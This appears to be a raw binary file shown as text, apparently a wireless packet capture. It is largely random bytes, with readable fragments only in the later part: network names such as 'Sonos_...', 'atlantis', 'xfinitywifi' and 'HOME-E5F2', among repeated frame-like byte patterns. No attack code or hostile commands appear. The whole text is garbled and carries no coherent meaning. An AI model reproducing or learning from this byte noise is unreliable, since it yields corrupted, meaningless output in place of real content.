OxOLY($di89NbR:5Yo4Ք~#HJ@}U^K@Þ8__Kb-c:gqxPh.\$4HvZM0ZN+6\B)b7"{C׳ {L juyPHH$2TAT\5:.$KZiMOw,jRii!jF"u 3CNl&BzM\$,μ>\ u05@2Me#$ vG,!  jGR>+a0P?}^-z/ˣ5I[oGy}xB8٠ 0cWpJA_h%B"v1 GrFN'fldӕu&+U$"l>f>%砣#k$A?JB*n?j81EK9%&4G 1 2g2s&`*Nkݖ>gZ_Ge<&W II *d[鱇Z6ѻ{v8e!o(qL0v&i]e!! j$=bRa !^pg4]0=@^7CB3x҉}2 ~GU){E!!:[Y*Ow/K y5rTXR@b:`vpuJ0SEeġk1 %OdrXcVu?"×$gUX!͞b{ڝieTݱp`UjmYj;Ճؗ7zj%Ns.KmJ-jq{6 уR+%^?n'&Ij":L1((!z,*fƮ[:_Z pWϱ'եʥag-jIrF6҆8OH)3EU,ѹ`~ֱ9D$rsbΐ*ڌ$׫yJ26ҏD2"~4vϯJIƖu NB+U1GρòB7 M{ςta0F{78A=s0&j% > E j} ~y'ANmx|$σK\Pڢ0/},)Jzυ|rOZH}sχOMA Ead*Yl5ܱ&όl[`Cޥ-ODC3ύŲJ'|$We)5JMw _v@ʹdw1ÿ@*鞫m،$ϙ&Se6Eh1U Br14?: >YFaDdnp$k¯FTbq@̆.h( 7pjL ~9gy\dUټG0o vzv»($oogru" L*"O H6MԒ$,B6#RVqo(~O,AOrZW˙@; ܑ XelgܗQqD_`8}Am=$N4%K__|~A@S؃ȵ<[F[gt7~X.N'^_G2Sl$tn)Q]=SF7ȩJ.`xY:3Js}'b2O˖]>R|k-AĔ;nle 9&V!dS?#Q팤SL'$4&΁d 9ų 8ͽ2y.Eq>8.Z{Ayth}>4-HavN!XhlD8QҌxoFqأ'VY~χF$Vc/+%Rdc6Ioz-V~mc],{c mUS耙u:^ΈL#B7I18~zC?$S}m^15>C|1(*Db xTy3; ʉ,sE2TEzul8v$V`BdA$i~@vzˈ2_,+WEyb) " O1-߅uM+M !$ ǥ S5xAp [1FRY!ax= )ix];֋$w(_U#C*̍_Af1Ybȃ6VZ7;F]]J%$?$X [NsIvƠS3g@臈eʉ$7M2;xkœZ+}gI}$&`pjym.{T6Mx-]MSfOĩ%ϰbS~;@Nd:0}:U`aD! 3U Ss$&uBv:% !~K$R jѿ',ֽq+͉>MR aZnɂ=gkPĠ| Óx߻w=lj;F^VW! ؊h)ܒe+ڶM`\$H'OŹ#V0#W`ZZSo3h]6h~rR&Q۰c/" @4ƀ^/oN+fzP#0:C"Us¶sբc'M#דf$#* t:X(=n$$/N)u:,6>(aD%8ZL[|Zeξ>%PwW߮9T'vp\S jp q N1H$)s=u.1w>& * r(֍a:"ܒ*~NXhCw*RC?BOs7wGg;֡FS}$(/- ؏pƕ*]av=arT es0$0d3_-yELa?SК2څ#+:kl'.`Xg3`x*Lӥ5Ӛ6RՅBN5jCm7!tPdz;NЈk:Ǧ" nWCXTދ<ME}/$a/a9xud=L7?a6˦iqݩ3^,-7Yo,6y!b~ҽ^p4$B6PCv$k\8Ct8ozY-%=IWpo#D5E}qJQD;ʿērn$vLK- uPedGT]Mb5vP *o}̅c>;X^-ffB3 ґ:aS7 U0$_>-uMO^9v+FWC>$Y%kos_ʞbUJ2#5 Q*Jfҭ٭{ǻ[)ͫݜk$[@zn7d_ve$j}\*wGJFl;e\AazKdY\;l#2 {Ţ|e9|H@h\:kfQ ޽yuge'D%:fhx+2UNiLN}4#7ΈS)i؁/MF:fޖzhwzbuig#v#06lqFBO$ptZI'>`q}^G$ Rہ6#%O )0mYƙVM6_EܙhgaFRF=.\Џ)5s{qBApIR1aLTmFGa3po0 ?٦=g]VM=9$$)_gq8oi(l(zБ#Н1x|1Ԥ ^D^Еe#e&xcЙzu0,MD 7Лex/Xz М7)vm=ҩiMM cФ TDM\g„֮ڟP f4ȟc8qr]-v$Х`7%j݆jR-uN9Ч60Sl ~Jl|Шj qeZXb_/<Э n@ {E#d0AЮuntTN*Brg+вV\L 4ZU-'LV\\CR5ܵx-qr CnJ?$л*T-96,H:(B=о!\L5EC DgNcKcTk[,Űh@ClS$7XKa*f%P%iX.Gafo*' LMN㮍$8mX+zMw*G^ (P$Ȧ㣴Ys$ڷW[a8Q*6 76ZKŒ.2VzDhp5^ ЂwL s{zܟ+耀]zr; &51O\"Jm'屉4 5"D#t>fܫN/^:j)A,Ϫ ^VRQN"ZebUpS_\=*Ct r}A?X=)> M{!=/vIS։As"m⊀A.˱(I=Y$Ӕ68,<\)Уyw׾P"V6Zf!ߪ^ z7`yp3eԘxE]Yv$C$0&$F>Q1Cɤ|;azҖJyvo 2[G{`%Ze")9X0RpB(ce1) PoAu6(M m+q3>V&9Tje2L^$A2z@Ds tM)"u(t|t+N/³xnE!hy$)zJ%_hdpS7؟Ah41C>>tR3ҩ?6z+P$YF@J?ˌq ?)8,uL t97q?$T//jq FNiNqD "g2<=o5q/kKܲ~k mV864ՑcuBZV i & ̱$ss:S% I6k Ъ*6 'i|5l띚Ғ_^SkB$Oy _XP|5 m0!WL&noՖXkܯ{c0}e-PS5gϯ(_K09H'EJ0 JZ..)m pGTBxuCnJ'05$Jitߜ33*x ])s'44Ŋ&ܡMxm $OzyӜ;, ''nN(,n"ݓKhex$)Ft>f"8ZT$o!1 [ Ԏl &?1:05,p<`Y~e"V8?w$7I1{KO`AO8-*o zUR9]t\~yPqM;DO$ rYnÜFydX c8!l~1h׹9x|#,8'$<'exI 3:(N?lYH%4bȾX+@z?ќ`.BHQSAAF|d2%ha\>#C*/*J)ʆ[IJ5~`6J lAtR63nC},Ơէ)F$Zy1DIkK PeGt_h^6b(`62Fj>%o:a}T3D{dˌ]9\do*!EF?S&7NxDwl:(E N|nV03JQ@B6<&혷޹ok1a*N^NP"b'lR;#h=|MpC3dsMYS C$px˭:̮2RP^ I}+sg  e'd,ˤxm &1*;K֕-."sz@:Y`jm՟L{7N볘PRbj&WNehы(LNM7;r864(ь`[RzoN 2N!*1?>nk HeWY ѐ]z\nPUT\m_ Sё-^X,Aoj?ѓTO򃜫eTd1w-ј󐧸GH4sX5kӶњﵩF`iJeRќ1ZEE`+0*xGrǶSchRĄS@a~lB;+ΊOLYdܮ7D/JX$ѡ[OT'QqIrώѧė1d~q yh^ Ѩz0ϴX%*υweѩO-[:sTO7O`ەѪ5T){5. ѫ<CF&4/> Ѭ1**]H#" oH_=*3xʶύY0GѱI?1B&b@lkQ? GѴ2?m5_ 5uѵ?dΥl+%H<-]&NRѶ* 9 }O| LL*K=ƻV E-Pq=t$n " X⼒{T}~@v,jO$O*7k.friL",vȊL*z']HU`Z=O1*2|?V)ݥ]$fc:I 1zr&Y]:]QK?V*x)! P2:^!E, ON:}"\ tȩV~#Z9ȈZK^$jCW?Cx)71:CN@@Oj)5l܆,>#t;-HRjȰ/N6n?$Oۖ1جU V)`K[+7ly!f$x>W,=}0e>4Q۰Q]CēqsΣ8EFs$ a-OIEǂ?v'>*WhC$>,Fd+b(8VAV1>$}IQ<Ì:hh1=FDžth >u `MU޵A.aʡ$ыr:$CbBp'S$թ@*2vE=8t F cf|^z>jӽn$*@v:P?pLȅc>8ي@]:HH^gs#8;*%0$ t*;Pyw9Ōpv! T]{?ZlEvP{ aC e'Cͅɶ,3ںdr%'\HtDa!%p*m7$ݙ(]v#?"h\`MS:()U7uVfDNjt/mH!%m qV"^DW$o9\";%"Yd*} MJ}A͉j.;$ͦ7 }貚;\ϸS||Ũ4YpmK&l-W2ܷ*;"n%LI#tJEy|G jgAe9h#±cbdpQ[i' m94Jk#r;@ jb*)7-f$ "%J||4Qv^ [ԸpPBxOiOAp0D5$*gK:ax^i2wHd64.i{E?܍|ůCX6Rrf$%K[\W%\;3d&.0%;'WAm6ކA~=SI+ƶN]]Ow,0ѥ*BEW#ŵ_{a?,`\9&%LLO&4f.0k'D~B*yqF/,.ȃgX'$2fXx > +D4Ȥ#o,k.GmU9.$KcمWHLKGrq GKٚRD&}NQnՃ $:Ujs;hs[@T`OʔMݏy f]\_ &)× bby5$;k p=0mlق=ݟ#.[p9[~BaG&~:ZW#+@42ҁ$>g0 0@6W< vӕVIG:XYEЈ}? 0l$@$=:D`k*`]ݥqz*#ہ 8o h㳿*AKk`:H#7ZBfVM5FV޴+>)6*0 &3 u~R6WeT;*pZ ; M\^@]9r=usp䚖вb3hvҰ;YM1$$E>Dw o{NIݳUIw*7Bx>rJ˰P.sJo1Lfuakw; )*FuUFA^/Qis| Dy /7"4R#Kw Ah$iHWLwlII$,1!_c7h,+jRbFet2-򐾱 L1!C$XƪB%%hK7hY8sB A;\!{k%0kp瞞@ӹ]1r=%?a툤^N4}!ݩ,Cp) E#oڹl 5/hI{Vz <$a3xxsuY# F"ڹC(5+pT80>Iy?6.t"wTjs%fe.ďId$hkkHI"! Ed9&=ER5QymPf/KOcqPHf>Md m$iB_XZ⍲'\(ins7 rBTrJ0ɳ6 5Μ$d IJ$k @{ĤthѐDw9=1(>s9jRHX*6%i![*>?MMƵdgE\$$l4íl~W V~n'.!iΘ7Hq$C tk)k>5h>Y$mN Oxb0m)8d٪'+Hej}9g론0d/eԛU#ö15R{V$n r=>:ىW=\'o df6|I?BV[s~$wy ^UZl Nщ{xbF*m;;$`y w: >R?4 Y& )1_ z⥝ț{@ί$z؁L2^4H3;O7ҁ@ L$CsW E҃ztfb<~J'wڭ҇?Bd|]ҋ9FSo~qdZҌ| Dx~GS !gҐ!Vn%2++:g>L^f}GҒ/GFe1ld:蟗aToj{<ږEt3u]ZN_`ηrp$~$қf@j+mpTҡEB1E2GCo9!7ңƈ7+-M3uʼ`O ¢qPg ?1ªuF/$Ҥ0i|%xwKmҥJTTiY#aҦ.=as | 8ҧuܜ0%TʬT`+\;fҨX@/d{T5221ҩ4.XTUw \LքҫNwB'*WMFҬ Gv"On廒&`>tҭXwn~&,^hoPҵ`.obU6",_BҶVZXkm c ҹU~/>#8SX/u0e-pLUİ&tyɴڥߖX/m3#y?!$Ҽ0{Å% XKOҽ b`;-Lݷ;+P+,p\'د)b s&'k?H^ {ƵN"%*ioDŇ#qDk*ߗs&H1!dQꞳoIL;8)4.yѳ^~BDl$նZtȷ ,ςDcYE,f"Ƽ!gį3ƷH6[rFTg7Ό 1ftApBN'c7#zṿpW"<*]vZ{b׶a4XxV.n /((6t#X=!N5b5[*6U- WrJA!Ȥ\c "r,}+u{ BO()$ C*%L=V/ϳ"/$Rzio zI&2@d!mh2p2!eՈGi'2]$ >*++auKA~+n ^-ĔOkeD 6Z:ģh4E JS='Z_d }@Q=u):RR4+qz6;o 7"ћ銓'`*m^LUؾüzp*{YgID:Dڸct5걍W$'x;ġa5wH,ACkRӤ_Ãhog#PIN$)Q%Db>8)A*rz^s'QYYV\/.<\<"a.P|1<`Ú#x)+Mk0|bΆnNL9t敺AKڝ7 [,o* qjm @W2$+| )`Ĥi"R@a]% H "Q=Y{5%E:דkM0$7VN NM:az @\t 8"IptH>EzXyʓқ]#/СP̳P"$8;,bZ]cn[,rf~V}#3MaouEmؿ8[s2$;z㈇cQ8?=gm[#_]#e8y$R!o<!Uy8D Ln-}v,^иmB7%Vq{`$__kOpKonD)楨!84:f^#=F%=-އ]4z"3,ѿV$`w{Hoj#iq z|bE- s٦6:+f:NVQ&gnwgh7hm~i߱U?FF]'RNj-Sh]ބQ]k(!E1@F1b+FlY]ML|24n܄d6LL̆yoj PͰ[?ˉk{*+$[:5S+JӴ)Apc{ 9XGDuPcqgM=EL\?ivD{Yϒj7gxITFE|;3ޞȵFmӈRG?!r%@Of}y{AڳӉGk‘B<H]Ӎ(s9}ݸ6ԛIӏx] n!kkրӐsqCnD>#u,!U=HU/־cH![ӑۏ&`Ugnn!S@Zә/gAҘ"$P0,T,֤.Ӛ3f n"qPx6EGfg69Z0Ҙ#' ;g33P$Ӝtڎwg940ri66J0>9zerB&o;ʙʳe y[Yd z꾌($ӝf,CؚtoRS܄?J)7f̓b@B(6zm| [":zbn(_/$Ө TȜ~X!.ӪhuAʵgF’\ӫF^3l~/WPӬdnl1E G2JN:Wubq597AshذtL^1:wN$ӭsK1S Kjt&)2y,] Ӯմ]&"aQ=FaAӰ-Y* wK xĹӱu EZt0f1IS@_ ӳ Pt+6>Ӵo(ͩ1iӷ=FؾU ӹo`:fFOyӼB=)13n6"yn D= |')Nm~A:)2 B\oIJ֙Gx,[R{R]]$ZFxѽP(b`o+t`م*mGCUQiwϐ"M$8?;>LGA3 ?rޱg&uyp^);*ے!#'5=s]W$aBd()phg07_vfH$Ƽ!"~>r^z큐!L$:oN!t鿂JO:,[#dkzEn[Wqt3h4uC{%d ,x2e$*FdDP5ZrdB~&L|A5J@t˧M F}N)8e[Pd]U)8q.[[hP@fB!J 6b5)B3<%V)$4Š9{[XsTD$K8'KW̅3ؚg-~}G8$Xcyf$͋Z+ФEHlà~@;H5'Fw2 MC:8f,5x0)S5R/ΪtWBv핦|Oh&Lf@7s'Htܣ+F4&x U%rKjL{FR)k$ 7 R8 lp̘BsmQثrCO)*$dӑ>Y:s'e_Oy ] !`CuZ*., Qu8gL$L; І}ioI˅VзoV}-̈́k>ڟ`Ǹ]/[ (S$"aPO6!y$t!pyҫ g y˖X穬_& &-fF\5Cb-a$E&<>&4l+`jU\qPi7 .3"c (&Jɬ}& $%U¹B)v)aJ5jz|REEZB +S)yd `*zrvB$&ȯGjȠE&>3Ouutf Τ)nPqId*e8( NA3M$+{@1_\ѨX |ϥX;fc]9Q$,m)"^{T0lZ{YtSn`*)jq3G,kK`Iy $,z|w]o1S'/b.-,?Uܗiيqd}Jbѧof>2v˓{uAcn}i\bĩ$8%!ԯgO %4v̦F3=ݑ ޡIJ)0$1Ѳ>ñGƄvUsN6b3OB[bCmDE( I1ei#Shz EJO1/8HS^Ot|4IӠ'^.;$]/aGJߕK-m$Lo lm4X{M6a2g2;"ZdO m\*RyH=z u 9*P$PuvXx-+@ tw[0$EnzQ')h@Aje,MyRvpx)YzzInE@UYt"+n$;0eړ̼W`) &F#jg!Ii26e _o"Km; 5>Hݴ]hAc Τ9 8ľ$m.lÆުGEr~:̡YRKlѝ_mn$qs)^Uyr-ـ 8bM\`ec3Vpg9āQk] C+$tDfٷ`$<_ tߦ8qD_$G~}bx (fOs p]Of,+v-$wTl#;K˶| 驛lD `=1zvB&^ 1T"D,Ш{7hgBU$$x*a @/TGг-jK oNAv]*_)({W!U5MeZO^},Qo$y/`v6Rrci>`(EJvfD=AIV1z_A:9JF$mQY`7${# H363BkC'| "b12$uTh9Ij}>GԔӵ K1S^ oڊsޣ_,wnV$}**/TbQ&U5,[ԁSnA^4tH{Ԃkg3Vtԇ5nM(槒Fg_{wԉKdëMi}- &Ԋޞz6Iz7509v#OcNMv:/w% L(WK$c]ӻ<$ԏLX_$ԫEr{^~}/NH4r40ܟD2.qg"4=to)E%$Ԭg|.+d1p( :9gRתzvɖ%ypX-[c[fŏ$ԴLN~=Eıowaz-t8Bz$3O:+ihY Z!y&~2`@uHvu\}fsVN1î$eWSD8}Yq0^w 'N>>$4ŪtM'pYOaf٢}ad`DX0}$78#om:>~PIEtR# YN ˱ v%7Pk*F iXT|˟?l lW򜲋P*Tk'pH$OQk/D{{%h;L]suG4XA 6suXz{'z@)RFo $o]SԶɦG"!+eEM ے<]NQ[-QmippzyTjo:7 ;&zVIM'w)v%b.eM"58A$6|lU{;Gr%[umOԊ{c 9C]Uȱǁ >big=E;nllkH`~$bQ|>GF%3MY p`$eXy b\X8 3c12y7!$5[wv%K ]Br^lQ]z pL3$ 'MBOEYv݊`pONL$ ,?@&_2-3!!,pߏ{/3мBʣ?P-8FV{,;\rjBz28FFI6#$~$=ˡc}.$"0>{RY$y մP}ՍzkqE瓐! !5ͺfR\FE A@\GިcU.)DPj/Sa0&ջCۮ*p e3G;,iA򵾑V 0R)38.E5'2o+v-u $_E7udJ$ -gXm*׻M^K~QW.i>B. uq6z |nF  S>$.@Nt'`G{oxWJ0/1O.t46M`\z3pB2l$!ee6)uPRhxFTC_C5~m\x':kcm^pT$"ll߼@'{(x0b!#:*﵃; $r%>)Jng~/gbxHR Í2iH?h+d4,4b'}i2hq$&f9( 7M27!*VgZ&6U姝-'-˜~0:-U @=Or~FF28;zFmހbysyw0)_tY+ D+E$7t|:dm;l<{%5җR`/ =Lb}0=TŮ Ң жt(į>O#h ƪuusÄDV@o23$?7\;/7^}A:SG❗`Թ^FZˋi9."-vN0%4 C8cEA9$Aԇ(H vؓ-2fiUrO.jGG(-è=b 7-TCl):DZy9uNl$Tl}͕Gqى0j N1ap$I[ E 6|F K(L$s qls\dtqL8ۗ `Dle0Kf>QѕjVs@Kw >ZI[?b>#p|$OE7"9@iא2*AQDZF %^`- G $VxcٵZsf)G`8YU/w!.2Z>AQ@yxCf.m+bW4ۃk!T-N4e_ ]>Ty5?6{9q=u\Q} /U& 7X'?`|$f8'-4?.y2ah%bvelN}% 25{=U|^lm1NV &)Wi PX2\7&rL $icIe/:Bx…X(-2K[ׇ\J}%khoZ;?؄eaObB ֎w $՝Hcׄx!N"mE1;-Yw>H4[ع!՟Qk?t;t7iN{-F·%A QˉZ] Q^np\{ nt,$ vK$ե*~LnLW%q+ZWۓէ!%^92< ?v9/jh|~{vgxKLBޟ$թRn1n4>Vodլڿ3Ucx$)k<_M7ȇʲՐД$շXP !Pbgո'ykHHe9Mq+d!>ԌѩóWI6k xmQV1g$$չd$\ `Ek0d/պLALI9q`'7'Z]~~J|mGQvUi*QZA00\'QCJ vB5nBL,C9?jtCV oZ6W4~n1dV$Vi>O1ӱU0h%8՞%Z(eϓh]t2$ٸ@2q$z f:&JڞzJh~ՓTUpZ kp28F; oԗ2:°$nw6 .et e' %n wcǾ.! S|?@3,x͉2Λ!cn u<zĐl,"펤]Q #|B\ gL|"s!ؿLaQPuQK)m+O,bStبTogLa?3.gA&eЏa⣜P SpVtxGq3[ ;[doKZkUFI"S̩Ma?_XL.@YRO=2A Rp"|.oI^?Lzt^ǘ&*M$ܐ*Y$ ]92j Zyab͑{a_Y$!6t<VAQ-75bTa<ɓNn Rpq2хמj$Jbs~$Ł)#| Φ/ [=Z.t)9bVF&Zn\\=Ϡv W5 ֝pnwWVC;wVXSv{`@m %PXf$[xU(@cXhF8cE-Nwߌ%EV't@ +0kY&Wg<~ 09c桩yZ^EU#n %g4f$IK3gi)$'Y ٜVd+&͵_f(iLA!xADZ0")?j0SE7d*'tC}LAp E c+'qmwFW P3_o.M:gl|t!6ZV[ߢR6y՘(>Q #X[uu4[.WYw䙟R] EY_$7{@tP7u0v{[֔R2/\HFT~:h?!rҴgg-qVd1{ր2%J(/.{(=@-WքޝXt15JC/Vjpק̑ 㭁SIT1/Cܶ8$C3$օϩ 2QS'F+{pSw֊}I3λ3|J3 ֌  E;gE.-Jm3pCjMuQxČާ\VCN  !*{ [sEdHjlnZD$֑ARr퐲3'X/VJ O8\-`M_J4Hދކ&Y0 .$֓YvиtQP29vO֔,_|T=,^y֕"^d;`w?B%0Ӱw)O.~%a4ЁE䭚($֘?mӘݗ9u iB.D"āvzR_>j2֙E6  '`]{Ngb"o w?|w\[ p)~ysvUpvuJ3H$֚[_IKoX1#ȨIcֶ?Qh38<[mַE$=.bb[0 Ԙ3p$Q.Yg.0Q<%>G !ָ6<)/f {S OuKe"A`YHj> wi IJ4 X|[nf$x<7)*Tm32`LBk%j 0wefqL{x88@& 8L㥍;XO k,$D A2zA+ H틒N$C$/UTF)^`!FhcDtDHWW26pd< Rn`QN'ꌴX/ 4$/dYQ6+3J88q|Ev27{"U |Ⱦog_6C p'\~؋$/Iq+SO2I_سlހO[,ͮ.I6zgZf.c21#S" jM$yVh5-$}g2 /pts<b /8mc7v w`S'T$be#H%݆1h`ȃ$an0$m>'pBZ&K)HQ-<,fiU9d>;Ҟ>)Gd5Lǁ.8D:֋oʑmQqEHVDO{,7ZS$ TM Żd'3vC*ALf 6RozyA}X#NsʗAy4R@AA#.Gau$?tJO?=0m`dupMuwFlG㈯cT@M3޾Cht īlb;$8흌.a L(::g,b@ʤ/,p)K5ԨOޭHhnԉ&ԌN:?َJ9Iv\@=![ )$ ? +M \§pHb+&ٕ^Uu!3%NYO^S{<[$ψ5\jD-L+TCլc%&y17:Ac "c_4DG:\f#O$ `YlМHyTV %~@ ݟ"#Lb 5B}}Ɇ[PYfAjw#KOJ{1P_ȔM<EE97r{$[:ͯg!K1B˘M;)*Iz0,r^6 5f$#;G~eC7w% HbL$Icf_1rJru$`bz"Wo_"lGh'щfىcQj7ym{#~`QIlXQ |!-wpWF^ #lX"EqlU(okӫ P+W/>͕0&sp #z;kJt'%溸>|y_;8'gJl){] +%r6$%;xkAާv^*/{fp\jp$5Z18@I $z{8"J4%`o1vA9$(BdNfC2a6)6K4kͿz/ߙ>$EGG .k*'{:[vy?)X6L2@Gaк%X]~al1 cP .Lx꥗|1Oe=:v8LV1Ф̿Y1ѠA$fT>^u^2EIl FWr@xT`FQ+7*-!q9?G- g,Dpolr^+iRJ(,MOYy8Gar0+]=ҳ&T1cﶛ$KlLSmYjמ"ѾS2f;|mHN;8{ 7=K4nv'XF$OqXB4?U2SKQzRxsm]xH F&cV ]W:>Pj#6LLXmȀRk+Yp$B uGFm hK2e(gu*LL>B/QI$Zcr\,z?(zІ#P(/  jFPC,FQ9޹{h6s: yKۓăaz_N7[$]On5^s)k:?45pSY^0x )9_,La=ښ%n= 0-T/qk ܝSh~pÕق))Bb H%>.яdIM( ٝ&Ո> @< !]>+9Y@]QP,niC$gNFinS>p 3r4h2x'*8Lؠi)v'+ [:Iolc ˀL'J3G4DfJ°֝[9:@ ;f]*p]3;fËG|$qNk iUU@(<w}:HVb>SiJ.6cS'[ˁ]Vk%MB"rſF/$y#Q>8|dR赲~dr,Rphy׀V.:JǓi2,;8E" aBTKB-xz09*w$׆[A F)ɡt׊AzNj4ʦs ƁA׎E<M$׏~QI\N,nڎn[riMKdەݖ>#+bHOR2y _|}x$בmolH<Ƀvג2ۦ1`Va F}f1B-O8hqDǨ"^lrq4!`LAxS1}$ה͘91d&)ϬA *\hʽ1܉)Ijg aS0u˱x&tD$זerسkia_^9^^"'==.VdɀKYrNhaO$2Tdq,Ydq,22gq,gq,טn u|OOOT^vĆ_:Y꿫l~[3f R%I%6^5 'sc:hZN$ךyVg%_g/JJg x=6(I@12;Œ-TLbN_$כk Q >B=YE7לKA )/%~I2^1[,םs] ȓ'M#tM7סZf!|kv\w;ץeۛwpklcQ"צe^8Z,䟤aק ?#]`ȇȠPcRשbV`ъě _OiۡEתb nKWYUI-׬##=~bS׮G /bw069|PԥDHY.Bx {s%QE2@4_wI$ױH#6;UcB0&; Y87Tƕz1t5 <:ON$׶S:i/QQz0}m,Haz׼ aPp,'݌FJghIW mUIxAj E"0yJ}^P/B$*0"I^h/ٹUudQ~:\%ƻZwˢS9`lnaZ *{*d7:.SʢQƉ;5UN$ۀ_Lìǥ n$RJMfhs~ȆbS;uQ$@E. =&p:&ia,36`؂ hDV6pjQ{^;G9P _~XBhkUp֚vљ(< #$`냒#`c>=SŽW%"Cp׳%H[]T[@U+`wlecϮtv"e>zZ*$TaMi~k wŀu4I;Fڷ'qD+- T50#b\jUc 8${\\jU--̤b̤b0ldd HOME-E5F2$Hl2`US  1PJDG(((̤b<I7* *-=J ,PPPPP0P'BC^b2/ z C\jUb ڨ෱MAPjH 53)c֯?gQ@9.B=´x"fj 3nq/8Gǟ{a-p߄="DF s1eN>z\jU 8${\\jU T${\\jUB ڨ෱MA`k+$׭_cm1Ãw+P{B+T4INB#6ƨNc|IbwfAb]E{-Y۔q _2_Ͱ\jU  \ =c\jU* `${\\jUd 8${\\jU  8${\\jU `${\\jU  \ =c\jU 8${\\jUF2\=F2\=wjn,d1 $Hl*/0 2`-= P'BC^b2/\jUB33D2\(\jUnn@,X|aX6X|a T |-ۅ3Y#TWށe~&2z7e#7 x3ىT m=~W~'PQ&Lͥ\jU a~՛\jU ՛\jU 8${\\jU a~\jU 8${\\jU zz@X60T Sonos_ynFI1HY4cF3gqPuljCuicmFZ66GHX ?X|a?IJNK#XX6 X6\jU 8${\\jU T${\\jU ${\\jU 8${\\jU  \ =c\jU `${\\jU  \ =c\jU0@X r Sonos_ynFI1HY4cF3gqPuljCuicmFZ66G{HX6??X|a6IJ NK$XX  X6X \jUsD2\!5AV(\jU,NNB0909@]fQ_Z(\K›`t߿$uqӵk>/*ۓ[4L\jU@,X|aX6X|aT hs BvƷ@;7FA1ZoU"ԕ`ݿEyPg+ߠ{CI.l} 3UC XNd/A۾hS+G"]CSǞ{+\jU X6\jU T${\\jU d dS8dJJML$0HlUS   #*02 `-=@ w  e P'BC^b2/F\jU @,X X6X U qyp~XgE @n[*8؟g5qK%JAa4ZJyFq HQy|O9%Fhx8CP8=K2e[1 HHKGDIÜfc̷%+Dkq, ˔3^2^`ާ8]wn\jU "a~՛\jU *a~՛\jU+ ՛\jU0@,X|aX6X|aU iDe9ҩqrjDdւ~ Ta,gتi']6:2!ͷK36C#D^(T"6JfKߩ5g= -1&D^o\@ߺ<=뉉CCR=dzSK%)0iJc\jU4 X6\jU 8 \ =c\jU H@,X X6X U TFUS>e+S OےyY<ǩj '>)opFflnj\jUL@,X|aX6X|aU yɜŦ1`MK*BOg. ]Ҏ0(Nĩz5@V)cp+ ~%<=>U]u\[&?O8OY:H7sl뙫AllfǬ}VMBc9(6F/ז!Z7@m&\jUP X6\jUS T${\\jU ba~՛\jUe ՛\jU la~՛\jU t@,X X6X U z"' , ,0O6W?",*w7">H e[sOȚV^7}he HۗbPb-GG>QF; j6\jU a~՛\jU a~՛\jU @,X X6X V  6#'l^.AAޑix HQހO繑I֞X ֢&YVR x-#}"V+ΆG4\jU `${\\jUH,X|aX6X|a V .)3GXL eSh^ X%9JߣQ7WW5ʳQ! `* rT$(yU "DX\jU a~՛\jU `${\\jU (a~՛\jU0@,X|aX6X|aV NÉ,`^;s&9`ZT,=a.k:|^W.|M''{<4o䢶#0ıKEJkUWz+|5I|r_+bv_<\jU 4 \ =c\jU D \ =c\jU N 8${\\jU V ${\\jU ba~՛\jU fa~՛\jU ja~՛\jU n 8${\\jU ra~՛\jUv T${\\jUy ${\\jU X6\jU `${\\jU  \ =c\jU  \ =c\jU a~՛\jU ՛\jU ՛\jU a~՛\jU @,X X6X W kh䒰\_mwNvMI )wƻp3[mgnwιMsnlU_fPq$a>\6Jwe5:}M2bW +-W yF~– PEy]pVs?\jU2 X6\jU`a~՛\jUd T${\\jUh ${\\jUp ${\\jU vJ0\ =c${\${\=} d`븋W7TfLeKa!p]xe:*z)( !ҹֻO %@V$kbCQJS; { ϿOO8R!*׿v^|'=B>,эa7DT_%/=h'UbK{F>QpN5t9ҡD| Qg/_ؾgx~FH:c| cnG߷)`|͉.Yr5Ɠލz{ÓAE `5pA酘pJ ^tbчaTc+6-4tXH' 7udBʯ"iLˊ=26aK|xQe?(HLZP' p2OuoԊLךʂV6i1ӂ#Cmh1K̷Zq`AXԩ'l36<"; a7~fvm<GƭGkZ&JOsЄݶVvǾ&9_.gؓEz7]@;,S6Y0 B۞Ŧ7+#ͳӿRJq5O6ᥱ @&[3Tb9-ivo"M-Xs+f 9v __fe5,$%ͽ6dNRD!b I_`pNɁZ0(1#hoQu~m[Q0ϗHAlFqE*.~ x KPFA~e]))1?pN9p] a#)_Hӥ<[>WhG(!΅d"rOL{ ? ORƮ7-V>i٤J>V}1֌˲0]._:)@0l6Y2*!uo`wi{F5<>ęV DqF>c[a3Y◤K/#}WUNyκC p)E`|W֣@Nu7b'Jܘ~{!Zk;QBmE]S7etinx\]e8Nn6Z-PTx6OޥVaƈ3 -rE._n }VSO'8p~ ^;'WR}ש,`rn)Φ,.) IХ9 ߘ)А`%wuV{VB9a\jU X6\jU%$%$52d1atlantis $US  *20H`l0- P3~3Q=FPPPPP'BC^b2/m %$\jU a~՛\jU T${\\jU8 T${\\jUD T${\\jUF d${\\jUo ``;3d1$US  *2H`l-=J ,@P'BC^b2/ 0PPPPP\jU T${\\jU T${\\jU d${\\jU \ =c\jU ¤b¤b`dd$Hl2`US  *-=J ,0P'BC^b2/ z C\jU " T${\\jU 0 T${\\jU4 d${\\jU J \ =c\jU N \ =c\jU T${\\jU T${\\jU ${\\jU \ =c\jU @X r Sonos_ynFI1HY4cF3gqPuljCuicmFZ66G|HX6??X|a6IJ NK$XX  X6X \jU T${\\jU T${\\jU, ${\\jU0 d${\\jU 4 h${\\jU 8 ddJ,\ =c${\${\pO} W5 L Ӈf "xY.Y sXEuFU5W檭iCֵG\ﻜ\jU V \ =c\jU[ ``"3d! xfinitywifi$US  *2H`l-=J ,@P'BC^b2/ \jU l@\jU H:oͲ*@oͲ*\jU @\jU l@\jU l@\jU p@\jU p@\jU p@\jU p@\jU p@\jU p@\jU p@\jU p@\jU T${\\jU T${\\jU d${\\jU \ =c\jU0 @,X6X X6rO~i'&Pset3~$+.SoR#6vKɼ0\gZ jE޷owNV۳d| -%I c+xo\jU2 @,X|aX6X|aX !B0Wڪ'¯77;Xj9J)јg3/K)Sf?f/ mql@6rUY C9R=Wh2jOs\jU4 X6\jU 8 \ =c\jU< X \jUD T${\\jUP T${\\jU Z @,X X6X X feb?&h"P{rC"hWpTC”O sK*FQҭ4#!"%hWvuՙxm{Ha@$m~ z553ˢb–7#*@/5(:eX,OPga%\jU^ X6\jU f d${\\jU v \ =c\jU | a~՛\jU a~՛\jU @,X X6X X!  SXf=(\gqvMNg+*;+>`_V*cW?~vv kv!Ǜ!FQ=9%YD`{v JL'\jU @,X|aX6X|aX" ZgvyBz2D|oh~AP^߰]Kf3)/8Y15#s/.dQWx>ZkHO,_\jU X6\jU @,X|aX6X|aY$ 